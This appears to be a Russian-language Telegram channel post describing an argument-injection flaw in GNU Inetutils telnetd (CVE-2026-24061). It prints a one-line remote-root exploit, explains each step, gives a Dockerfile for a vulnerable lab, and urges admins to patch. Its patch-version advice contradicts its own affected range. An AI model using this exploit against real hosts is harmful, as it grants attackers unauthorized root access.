TGViewer
папкин ИБшник, мамкин хацкер папкин ИБшник, мамкин хацкер @devshitops · 78 subscribers
Post #1189 67
папкин ИБшник, мамкин хацкер Еще даже не успели присвоить CVE В telnetd начиная с версии 1.9.3 (май 2015 года) и вплоть до 2.7 (включительно) существует уязвимость, которая позволяет любому подключиться от имени root, без проверки пароля. Под ударом практически все дистрибутивы Linux…
UPDATE: CVE-2026-24061 (взлом жеппы 2026)

Имеем critical 9.8 в telnetd, которой 11 лет от роду. Один эксплойт — и ты root на удалёнке.

Корпоративные legacy-системы, embedded-девайсы и забытые серверы до сих пор висят на порту 23. GreyNoise уже ловит массовые сканы.

Что произошло?
В 2015 году в GNU Inetutils добавили %U в шаблон вызова login, чтоб автологин работал без Kerberos. Коммит казался безобидным:
/usr/bin/login -p -h %h %?u{-f %u}{%U}

Но никто не подумал, что Telnet позволяет клиенту слать любые переменные окружения (RFC 1572). А %U — это тупо подстановка $USER.
Эксплойт в одну строку 🃏
USER="-f root" telnet -a 1.2.3.4 23

Бум:
1. Клиент шлёт USER="-f root" через Telnet negotiation.
2. telnetd подставляет в шаблон → /usr/bin/login -p -h ... -f root
3. login видит -f (уже аутентифицирован) → скипает пароль.
4. Привет, root shell без единого байта аутентификации.

Это классический argument injection (CWE-88). Не sanitization, не фильтры — просто подставили пользовательский ввод в аргументы.

Последствия?
Remote root на всех версиях GNU Inetutils telnetd 1.9.3–2.7 (почти 11 лет).
Не патчится старыми версиями — нужен апдейт до 2.5+ или патч от вендора.
Shodan/Censys: сотни тысяч устройств на 23 порту.
Уже эксплуатируют: persistence via SSH keys, second-stage payloads.

Тестовая лаба в Docker (чтоб самому пощупать)
FROM debian:11-slim

ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*

RUN useradd user1 && \
sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf

COPY docker-entrypoint.sh /docker-entrypoint.sh

EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]



В 2026 году telnet всё ещё жив? Linux-админы, которые его не вырубили в 2010-х — это новый вид мазохизма. SSH существует, ребята. Отключайте telnetd найух, обновляйтесь или хотя бы firewall'те 23 порт. Иначе в 2027 будем читать про массовые root'ы в embedded-роутерах и старых серверах.
More from @devshitops
  1. Sep 30, 2026И как итог этой истории - я дома, вылетели четко по прогнозу бота, сели даже чуть раньше.…
  2. Sep 29, 2026Post #1555
  3. Sep 25, 2026Ладно, чуть-чуть душу потравлю Сочинским закатом. Через недельку закину казанский закат 🌚…
  4. Sep 21, 2026И такс, на недельку, а то и две шит-пост от меня останавливается по причине отпуска. Однак…
  5. Sep 15, 2026photo post
  6. Sep 15, 2026BREAKING: NEW AI MODELS CONFIRM THE COW GO MOO MOO AND DUCK GOES QUACK QUACK AI EXPERTS ME…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →